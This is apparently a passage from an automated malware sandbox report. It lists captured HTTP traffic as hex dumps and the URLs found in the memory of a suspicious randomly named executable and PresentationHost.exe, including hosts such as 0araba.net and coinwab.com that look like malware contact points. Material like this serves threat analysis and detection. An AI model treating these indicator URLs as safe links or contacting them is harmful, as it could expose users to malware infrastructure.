09 59 eb 0d 09 99 7c cf c4 9f d5 e5 92 20 dd 41 55 03 d9 55 d6 15 83 1b 36 eb a1 1d 38 c3 a8 69 1d ab 1f 5d 3f 7f e1 dc a5 73 eb c7 ac 23 5b 8e d7 f1 b7 cc 28 90 76 7f 8d 1b 5c f4 65 47 34 c4 c6 c8 b3 23 c7 f7 2a d5 ab d7 57 8e 58 c7 2e 5f 6e 1e b3 ea 56 3a 48 3a 98 f0 3d 17 cd 1b a5 f9 c3 54 ca d6 40 7a ce 86 0a 23 f3 dd b0 5c 2d a1 bd 0a 02 3f 38 64 87 9a 58 46 9f 30 b0 1b a5 e2 40 b0 48 66 e1 51 b4 c1 16 7e 66 b9 08 2e 30 1a 69 24 3c b4 6c b3 9d 8a f2 cd d4 1d 24 a3 a5 b1 da f6 3b e3 0c d5 6d 63 08 5b 09 fd af 45 e6 6b a5 48 e5 32 c6 ec e4 53 ab dd 6d b9 4e b7 17 01 0f 34 96 0a 8a e3 70 e3 56 2b ad a0 21 a7 4a f4 e8 29 de 3b ce e6 c2 ae 86 e7 47 24 52 a4 ae 60 a2 f8 eb 78 2f 7e 14 ef c4 8f 45 fc 6d 7c 27 79 1f 1f ef c5 bb c9 07 c9 0d 7c de c5 ef 5e bc 1d df a1 ea ed 25 af 1d 0e 57 ea f0 44 ed b3 6d 83 50 9b 61 b5 17 45 c3 f0 ac 65 c1 f1 4c b8 ae 76 06 cf df f0 5d d7 df 12 9e ef 0f 15 50 82 0f f0 03 a0 45 05 c0 b3 0c ba e4 d0 ad 36 3c be 0f 61 fe 46 b3 9b c9 fb c9 cd ba 25 9b 75 0b eb 68 d6 67 16 d3 55 ad 56 ea e5 c6 56 20 87 43 0c 9a 2a 78 b6 bc c5 be d8 82 2f 80 12 16 36 62 b3 f4 fc 30 02 81 18 61 24 23 c7 86 01 66 66 9d d2 b5 91 ce 4f 76 5a 9e 68 63 c6 22 06 53 43 69 0e 67 f4 96 9b f5 e1 e2 7e 1d a5 11 0c 37 7d 76 3b d5 db 41 33 de d5 a6 8a 9f 90 0d e3 27 6c d7 07 fb 2c 39 a5 ee e1 a2 25 b7 47 51 e4 7b 61 a6 6b ac b9 00 00 5d 09 29 f5 07 18 c0 f5 83 16 5b 58 79 36 c1 2c ad 08 9d f7 54 0b b6 1f 48 97 0d 91 ea 33 ef 9f eb 2e 6d cf 46 01 17 17 86 18 ca 4e 07 26 6a b9 84 9a 59 d4 11 31 6b e4 59 5b 3d df 09 ad 55 bb a7 ec 7e 63 a9 c3 01 62 96 b7 97 e4 60 b8 82 f6 ad d0 1f 05 b6 6a 64 d3 13 23 97 9a bf a1 11 08 81 a2 b8 56 72 98 a2 ec 4c d9 05 3f 3c 78 2d 1d 7f 20 9d 9c d8 33 67 29 88 ad 1b 58 9e da b2 56 47 d1 20 93 6c 9f e4 54 47 71 65 34 c8 a4 5e a2 22 1b 2b 92 4e d7 6b 84 50 90 d7 69 61 9c 83 17 19 ff 03 80 f8 6f bc 23 92 8f e2 bd e4 93 e4 a6 88 ef 67 5c 70 b4 e0 7e e1 50 7a 73 b0 3a 0
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 02 Jul 2024 12:09:20 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeData Raw: 32 39 33 64 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 73 5f 61 64 61 70 74 69 76 65 22 20 6c 61 6e 67 3d 22 72 75 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 70 61 72 6b 69 6e 67 22 20 63 6f 6e 74 65 6e 74 3d 22 72 65 67 72 75 2d 72 64 61 70 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 77 77 77 2e 77 61 73 68 69 6f 2e 77 6f 72 6c 64 3c 2f 74 69 74 6c 65 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 68 72 65 66 3d 22 70 61 72 6b 69 6e 67 2d 72 64 61 70 2d 61 75 74 6f 2e 63 73 73 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 66 61 76 69 63 6f 6e 2e 69 63 6f 3f 31 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 3c 73 63 72 69 70 74 3e 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 3b 0a 2f 2a 5d 5d 3e 2a 2f 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 6f 6e 6c 6f 61 64 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 6d 61 6e 69 66 65 73 74 2e 6a 73 27 29 22 20 6f 6e 65 72 72 6f 72 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 6d 61 6e 69 66 65 73 74 2e 6a 73 27 2c 20 31 29 22 20 73 72 63 3d 22 2f 6d 61 6e 69 66 65 73 74 2e 6a 73 22 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 6f 6e 6c 6f 61 64 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2e 6a 73 27 29 22 20 6f 6e 65 72 72 6f 72 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2e 6a 73 27 2c 20 31 29 22 20 73 72 63 3d 22 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2e 6a 73 22 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 62 2d 70 61 67 65 20 62 2d 70 61 67 65 5f 74 79 70 65 5f 70 61 72 6b 69 6e 67 20 62 2d 70 61 72 6b 69 6e 67 20 62 2d 70 61 72 6b 69 6e 67 5f 62 67 5f 6c 69 67 68 74 22 3e 3c 68 65 61 64 65 72 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 20 62 2d 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 5f 74 79 70 65 5f 72 64 61 70 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 2d 6e 6f 74 65 20 62 2d 74 65 78 74 22 3e d0 94 d0 be d0 bc d0 b5 d0 bd 20 d0 b7 d0 b0 d1 80 d0 b5 d0 b3 d0 b8 d1 81 d
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Tue, 02 Jul 2024 12:09:48 GMTContent-Type: text/html; charset=UTF-8Content-Length: 564Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Tue, 02 Jul 2024 12:09:51 GMTContent-Type: text/html; charset=UTF-8Content-Length: 564Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Tue, 02 Jul 2024 12:09:54 GMTContent-Type: text/html; charset=UTF-8Content-Length: 564Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Tue, 02 Jul 2024 12:09:56 GMTContent-Type: text/html; charset=UTF-8Content-Length: 564Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
          Source: TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe, 00000003.00000002.4125575598.0000000008328000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.0araba.net
          Source: TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe, 00000003.00000002.4125575598.0000000008328000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.0araba.net/s5jh/
          Source: TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe, 00000003.00000002.4124406392.0000000007096000.00000004.80000000.00040000.00000000.sdmp, PresentationHost.exe, 00000006.00000002.4122364070.0000000006716000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/gsap/3.1.1/gsap.min.js
          Source: TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe, 00000003.00000002.4124406392.0000000007096000.00000004.80000000.00040000.00000000.sdmp, PresentationHost.exe, 00000006.00000002.4122364070.0000000006716000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css
          Source: TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe, 00000003.00000002.4124406392.0000000007096000.00000004.80000000.00040000.00000000.sdmp, PresentationHost.exe, 00000006.00000002.4122364070.0000000006716000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css
          Source: PresentationHost.exe, 00000006.00000002.4122364070.00000000060CE000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://coinwab.com/index.php/efdt/?wd98XJp=MALnGsSsCxZXAJsklBHSyvV4Cwt
          Source: PresentationHost.exe, 00000006.00000002.4122364070.00000000063F2000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://dhosting.pl
          Source: TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe, 00000003.00000002.4124406392.0000000006D72000.00000004.80000000.00040000.00000000.sdmp, PresentationHost.exe, 00000006.00000002.4122364070.00000000063F2000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://dhosting.pl/bledyhttp/domeny.html
          Source: TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe, 00000003.00000002.4124406392.0000000006D72000.00000004.80000000.00040000.00000000.sdmp, PresentationHost.exe, 00000006.00000002.4122364070.00000000063F2000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://dhosting.pl/bledyhttp/hosting.html
          Source: TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe, 00000003.00000002.4124406392.0000000006D72000.00000004.80000000.00040000.00000000.sdmp, PresentationHost.exe, 00000006.00000002.4122364070.00000000063F2000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://dhosting.pl/img/logo.svg
          Source: PresentationHost.exe, 00000006.00000002.4122364070.00000000063F2000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://dhosting.pl/kontakt
          Source: TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe, 00000003.00000002.4124406392.000000000754C000.00000004.80000000.00040000.00000000.sdmp, PresentationHost.exe, 00000006.00000002.4122364070.0000000006BCC000.00000004.10000000.00040000.00000000.sdmp, PresentationHost.exe, 00000006.00000002.4123664562.0000000007AE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://download.quark.cn/download/quarkpc?platform=android&ch=pcquark
          Source: TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe, 00000003.00000002.4124406392.000000000754C000.00000004.80000000.00040000.00000000.sdmp, PresentationHost.exe, 00000006.00000002.4122364070.0000000006BCC000.00000004.10000000.00040000.00000000.sdmp, PresentationHost.exe, 00000006.00000002.4123664562.0000000007AE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.alicdn.com/woodpeckerx/jssdk/plugins/globalerror.js
          Source: TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe, 00000003.00000002.4124406392.000000000754C000.00000004.80000000.00040000.00000000.sdmp, PresentationHost.exe, 00000006.00000002.4122364070.0000000006BCC000.00000004.10000000.00040000.00000000.sdmp, PresentationHost.exe, 00000006.00000002.4123664562.0000000007AE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.alicdn.com/woodpeckerx/jssdk/plugins/performance.js
          Source: TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe, 00000003.00000002.4124406392.000000000754C000.00000004.80000000.00040000.00000000.sdmp, PresentationHost.exe, 00000006.00000002.4122364070.0000000006BCC000.00000004.10000000.00040000.00000000.sdmp, PresentationHost.exe, 00000006.00000002.4123664562.0000000007AE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.alicdn.com/woodpeckerx/jssdk/wpkReporter.js
          Source: TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe, 00000003.00000002.4124406392.0000000007228000.00000004.80000000.00040000.00000000.sdmp, PresentationHost.exe, 00000006.00000002.4122364070.00000000068A8000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://help.reg.ru/support/ssl-sertifikaty/1-etap-zakaz-ssl-sertifikata/kak-zakazat-besplatnyy-ssl-
          Source: TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe, 00000003.00000002.4124406392.000000000754C000.00000004.80000000.00040000.00000000.sdmp, PresentationHost.exe, 00000006.00000002.4122364070.0000000006BCC000.00000004.10000000.00040000.00000000.sdmp, PresentationHost.exe, 00000006.00000002.4123664562.0000000007AE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://hm.baidu.com/hm.js?
          Source: TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe, 00000003.00000002.4124406392.000000000754C000.00000004.80000000.00040000.00000000.sdmp, PresentationHost.exe, 00000006.00000002.4122364070.0000000006BCC000.00000004.10000000.00040000.00000000.sdmp, PresentationHost.exe, 00000006.00000002.4123664562.0000000007AE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://image.uc.cn/s/uae/g/3o/berg/static/archer_index.e96dc6dc6863835f4ad0.js
          Source: TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe, 00000003.00000002.4124406392.000000000754C000.00000004.80000000.00040000.00000000.sdmp, PresentationHost.exe, 00000006.00000002.4122364070.0000000006BCC000.00000004.10000000.00040000.00000000.sdmp, PresentationHost.exe, 00000006.00000002.4123664562.0000000007AE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://image.uc.cn/s/uae/g/3o/berg/static/index.c4bc5b38d870fecd8a1f.css
          Source: PresentationHost.exe, 00000006.00000002.4121169221.0000000002E58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
          Source: PresentationHost.exe, 00000006.00000002.4121169221.0000000002E58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
          Source: PresentationHost.exe, 00000006.00000002.4121169221.0000000002E58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
          Source: PresentationHost.exe, 00000006.00000002.4121169221.0000000002E58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033m
          Source: PresentationHost.exe, 00000006.00000002.4121169221.0000000002E58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
          Source: PresentationHost.exe, 00000006.00000002.4121169221.0000000002E58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
          Source: TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe, 00000003.00000002.4124406392.0000000007228000.00000004.80000000.00040000.00000000.sdmp, PresentationHost.exe, 00000006.00000002.4122364070.00000000068A8000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://parking.reg.ru/script/get_domain_data?domain_name=www.washio.world&rand=
          Source: TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe, 00000003.00000002.4124406392.0000000007228000.00000004.80000000.00040000.00000000.sdmp, PresentationHost.exe, 00000006.00000002.4122364070.00000000068A8000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://reg.ru
          Source: TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe, 00000003.00000002.4124406392.000000000754C000.00000004.80000000.00040000.00000000.sdmp, PresentationHost.exe, 00000006.00000002.4122364070.0000000006BCC000.00000004.10000000.00040000.00000000.sdmp, PresentationHost.exe, 00000006.00000002.4123664562.0000000007AE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://track.uc.cn/collect
